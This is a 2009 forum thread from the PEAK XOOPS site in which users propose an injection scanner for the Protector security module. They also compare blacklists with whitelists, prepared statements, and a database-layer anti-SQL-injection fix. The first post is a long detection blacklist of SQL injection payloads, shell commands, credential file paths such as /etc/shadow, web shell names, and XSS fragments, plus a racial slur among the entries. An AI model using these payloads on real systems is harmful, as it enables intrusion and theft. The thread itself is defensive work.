PEAK XOOPS - injection scanner in englishin japanese

injection scanner

  • You cannot open a new topic into this forum
  • Guests cannot post into this forum
Previous post - Next post | Parent - Children.1 .2 .3 .4 .5 | Posted on 2009/3/2 14:04 | Last modified
onasre  ¾åÅùʼ   Posts: 38
Hello

Just another Idea i was thinking about, if protector could Has a file lets Call it scanner.php , this file job to search for any exploit command , and ban or log the ip for who tried to exploit the page . Exp when someone call a page like this http://xoops/modules/news/index.php?cmd=

as CMD is explot sql injection .

Now after we created the Scanner.php we need to include it in the mainfile then , we need to create a list of well known exploit character strings used for remote execution exploits.

and here some ..

chr(
chr=
chr%20
%20chr
wget%20
%20wget
wget(
cmd=
%20cmd
cmd%20
rush=
%20rush
rush%20
union%20
%20union
union(
union=
echr(
%20echr
echr%20
echr=
esystem(
esystem%20
cp%20
%20cp
cp(
mdir%20
%20mdir
mdir(
mcd%20
mrd%20
rm%20
%20mcd
%20mrd
%20rm
mcd(
mrd(
rm(
mcd=
mrd=
mv%20
rmdir%20
mv(
rmdir(
chmod(
chmod%20
%20chmod
chmod(
chmod=
chown%20
chgrp%20
chown(
chgrp(
locate%20
grep%20
locate(
grep(
diff%20
kill%20
kill(
killall
passwd%20
%20passwd
passwd(
telnet%20
vi(
vi%20
insert%20into
select%20
nigga(
%20nigga
nigga%20
fopen
fwrite
%20like
like%20
_REQUEST
_GET
$REQUEST
$GET
.system
HTTP_PHP
&aim
%20getenv
getenv%20
new_password
&icq
/etc/password
/etc/shadow
/etc/groups
/etc/gshadow
HTTP_USER_AGENT
HTTP_HOST
/bin/ps
wget%20
uname\x20-a
/usr/bin/id
/bin/echo
/bin/kill
/bin/
/sbin/
/usr/sbin
/chgrp
/chown
/usr/bin
g\+\+
bin/python
bin/tclsh
bin/nasm
perl%20
traceroute%20
ping%20
.pl
/usr/X11R6/bin/xterm
lsof%20
/bin/mail
.conf
motd%20
HTTP/1.
.inc.php
config.php
cgi-
.eml
file\://
file://
window.open
javascript\://
ijava script://
mg src
img%20src
.jsp
ftp.exe
xp_enumdsn
xp_availablemedia
xp_filelist
xp_cmdshell
nc.exe
.htpasswd
servlet
/etc/passwd
wwwacl
~root
~ftp
.js
.jsp
admin_
.history
bash_history
.bash_history
~nobody
server-info
server-status
reboot%20
halt%20
powerdown%20
/home/ftp
/home/www
secure_site, ok
chunked
org.apache
/servlet/con
<script
/robot.txt
/robots.txt
/perl
mod_gzip_status
db_mysql.inc
.inc
select%20from
select from
drop%20
.system
getenv
http_
_php
php_
phpinfo()
<?php
?>
sql=
%2527
<br
cc:
bcc:
\r
\n
admin'--
'%20or%200=0%20--
"%20or%200=0%20--
or%200=0%20--
'%20or%200=0%20#
"%20or%200=0%20#
or%200=0%20#
'%20or%20'x'='x
"%20or%20"x"="x
')%20or%20('x'='x
'%20or%201=1--
"%20or%201=1--
or%201=1--
'%20or%20a=a--
"%20or%20"a"="a
')%20or%20('a'='a
")%20or%20("a"="a
hi"%20or%20"a"="a
hi"%20or%201=1%20--
hi'%20or%201=1%20--
hi'%20or%20'a'='a
hi')%20or%20('a'='a
hi")%20or%20("a"="a
c99shell
r57shell
crystalshell
phpshell
dtool
fetch%20
curl%20
lynx%20
ls%20-
/var/tmp
cd%20
_SERVER
$SERVER
_POST
$POST
rundll32
PHP_SELF
<iframe
<script
<a href
<javascript
alert(
<img
<embed
<object
%20src
%3b
%2f
%3f
%3a
%40
%3d
%26
%3c
%3e
%22
%23
%7b
%7d
%7c
%5c
%5e
%7e
%5b
%5d
%60
%25
%27
\x3b
\x2f
\x3f
\x3a
\x40
\x3d
\x26
\x3c
\x3e
\x22
\x23
\x7b
\x7d
\x7c
\x5c
\x5e
\x7e
\x5b
\x5d
\x60
\x25
\x27


Just another idea..
Votes:19 Average:5.26
Previous post - Next post | Parent - No child | Posted on 2009/3/18 19:39 | Last modified
Mikhail  °ìÅùʼ From: Rio de Janeiro, Brasil  Posts: 15
Excellent idea. You can update your list looking in source codes of the last cracker-scanners and in your web-logs. I love to do it.

Ps1: a lot of web scanners created by genial "script kiddiez" and designed to attack can also be used to discover and solve potential security holes, but rarely the professional developers and webmasters do that (AFAIK).

Ps2: (maybe off-topic) I'm trying to code a new security scanner application (Win32/Lua) called "Pandora's Cube" that test all XOOPS files and uses all ~4.000 variables extracted from XOOPS Cube using PHPXREF 0.7. The objective is make a more specific tool to help to find some kind of vulnerabilities in XOOPS Cube.
Votes:11 Average:9.09
Previous post - Next post | Parent - No child | Posted on 2009/4/3 12:50
GIJOE  ÀèǤ·³Áâ   Posts: 4110
hi onasre.

I also think it's an interesting idea.

But the method of "black listing" can protect the site from only script kiddies or worms.
It never be a high hurdle for good-handed-crackers.

I believe DBLayer-Anti-SQL-Injection is a ultimate method protecting SQL Injection.

Now, I just want all core developpers adopt my overridable databasefactory.php
Votes:11 Average:6.36
Previous post - Next post | Parent - Children.1 | Posted on 2009/4/5 1:03 | Last modified
vaughan  ¾åÅùʼ   Posts: 37
interesting i think too, but then you will have to keep updating the list when new methods are found.

personally i think the whitelist approach is best of all. only allow what you want to allow, and prevent anything else.

Gijoe approach with this new db layer is excellent IMO.

I was also looking into DB layer aswell for icms, with the idea of better filtering and making better use of mysql_real_escape_string() instead of having all the addslashes() stripslashes() all over the place. aswell as SQL Prepared Statements instead of current methods. other filters such as PHP 5 native filter_var() & filter_input() etc
Votes:11 Average:6.36
Previous post - Next post | Parent - No child | Posted on 2009/4/11 18:08
GIJOE  ÀèǤ·³Áâ   Posts: 4110
hi vaughan.

I'm waiting that ImpressCMS adopt my databasefactory.php can work DBLayer-Anti-SQL-Injection of Protector 3.3

It must be a killer feature for securing CMS.
Votes:10 Average:9.00
Previous post - Next post | Parent - Children.1 | Posted on 2009/4/12 9:29
vaughan  ¾åÅùʼ   Posts: 37
hi Gijoe,

ImpressCMS 1.1.2 final includes your databasefactory.php modifications, so the patch file you include is not required for 1.1.2 final :)
Votes:10 Average:10.00
Previous post - Next post | Parent - No child | Posted on 2009/4/12 17:58 | Last modified
GIJOE  ÀèǤ·³Áâ   Posts: 4110
hi vaughan.

Quote:

ImpressCMS 1.1.2 final includes your databasefactory.php modifications, so the patch file you include is not required for 1.1.2 final :)

Oh!
It's my negligence.
I have to check ImpressCMS 1.1.2 and fix protector's package and documentation.

Anyway, thank you for the adoption.
This is another proof that ImpressCMS is a good security conscious CMS.
Votes:11 Average:9.09
Previous post - Next post | Parent - Children.1 | Posted on 2009/4/30 13:58
onasre  ¾åÅùʼ   Posts: 38
Glad you liked the Idea..

By the way Gijoe , are you going to do something about High Load Hits or load server..it was an idea from someone i forgot who was ..
Votes:8 Average:10.00
Previous post - Next post | Parent - No child | Posted on 2009/5/3 6:32
GIJOE  ÀèǤ·³Áâ   Posts: 4110
hi onasre.

Quote:

By the way Gijoe , are you going to do something about High Load Hits or load server..it was an idea from someone i forgot who was ..

You can find
precommon_bwlimit_errorlog.php
precommon_bwlimit_message.php
from TRUST/modules/protector/filters_disabled.

I cannot ensure it is always useful for high loaded sites.
I can say the Apache modules like mod_bandwidth might be better options if you can do that.
Votes:6 Average:10.00

  Advanced search


Login
Username or e-mail:

Password:

Remember Me

Lost Password?

Register now!